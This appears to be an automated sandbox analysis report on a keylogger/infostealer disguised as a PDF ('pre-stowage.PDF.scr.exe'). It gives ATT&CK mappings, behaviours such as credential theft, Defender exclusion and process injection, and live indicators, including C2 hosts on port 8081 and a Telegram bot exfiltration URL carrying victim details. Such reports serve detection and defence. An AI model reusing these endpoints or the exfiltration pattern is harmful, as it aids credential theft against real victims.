                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                111
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                31
                Disable or Modify Tools
                LSASS Memory1
                Security Software Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Network Configuration Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem13
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576531 Sample: pre-stowage.PDF.scr.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 21 reallyfreegeoip.org 2->21 23 api.telegram.org 2->23 25 2 other IPs or domains 2->25 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 43 12 other signatures 2->43 8 pre-stowage.PDF.scr.exe 3 2->8         started        signatures3 39 Tries to detect the country of the analysis system (by using the IP) 21->39 41 Uses the Telegram API (likely for C&C communication) 23->41 process4 signatures5 45 Adds a directory exclusion to Windows Defender 8->45 47 Injects a PE file into a foreign processes 8->47 11 pre-stowage.PDF.scr.exe 16 2 8->11         started        15 powershell.exe 23 8->15         started        process6 dnsIp7 27 api.telegram.org 149.154.167.220, 443, 49732, 49733 TELEGRAMRU United Kingdom 11->27 29 checkip.dyndns.com 193.122.130.0, 49702, 49713, 49715 ORACLE-BMC-31898US United States 11->29 31 reallyfreegeoip.org 172.67.177.134, 443, 49703, 49706 CLOUDFLARENETUS United States 11->31 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 53 Disable Task Manager(disabletaskmgr) 11->53 55 Disables the Windows task manager (taskmgr) 11->55 57 Loading BitLocker PowerShell Module 15->57 17 WmiPrvSE.exe 15->17         started        19 conhost.exe 15->19         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                pre-stowage.PDF.scr.exe29%ReversingLabs
                pre-stowage.PDF.scr.exe31%VirustotalBrowse
                pre-stowage.PDF.scr.exe100%AviraHEUR/AGEN.1362915
                pre-stowage.PDF.scr.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://crl.micros40%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabpre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icopre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botpre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orgpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.micros4pre-stowage.PDF.scr.exe, 00000004.00000002.3769722427.00000000061D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://chrome.google.com/webstore?hl=enpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://varders.kozow.com:8081pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://aborters.duckdns.org:8081pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ac.ecosia.org/autocomplete?q=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://anotherarmy.dns.army:8081pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.org/qpre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://chrome.google.com/webstore?hl=enlBpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.orgpre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.00000000029F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepre-stowage.PDF.scr.exe, 00000000.00000002.1319452030.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20apre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedpre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/pre-stowage.PDF.scr.exe, 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, pre-stowage.PDF.scr.exe, 00000004.00000002.3764112977.0000000002980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  149.154.167.220
                                                                                  api.telegram.orgUnited Kingdom
                                                                                  62041TELEGRAMRUfalse
                                                                                  193.122.130.0
                                                                                  checkip.dyndns.comUnited States
                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                  172.67.177.134
                                                                                  reallyfreegeoip.orgUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1576531
                                                                                  Start date and time:2024-12-17 08:32:47 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 6s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:13
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:pre-stowage.PDF.scr.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@3/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 103
                                                                                  • Number of non-executed functions: 30
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 4.245.163.56
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target pre-stowage.PDF.scr.exe, PID 6896 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  TimeTypeDescription
                                                                                  02:33:45API Interceptor10047706x Sleep call for process: pre-stowage.PDF.scr.exe modified
                                                                                  02:33:48API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                            l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      193.122.130.0HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      checkip.dyndns.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 193.122.130.0
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 158.101.44.242
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      api.telegram.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      reallyfreegeoip.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.67.152
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 172.67.177.134
                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      69633f.msiGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      ORACLE-BMC-31898USHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                      • 147.154.227.160
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 193.122.130.0
                                                                                                      end.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 130.61.86.87
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 158.101.44.242
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      CLOUDFLARENETUSHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.18.11.207
                                                                                                      Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.32.1
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 172.67.210.11
                                                                                                      Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.2.70
                                                                                                      DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.48.233
                                                                                                      SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 104.21.87.65
                                                                                                      DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.56.70
                                                                                                      he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.56.70
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 172.67.177.134
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 172.67.177.134
                                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 172.67.177.134
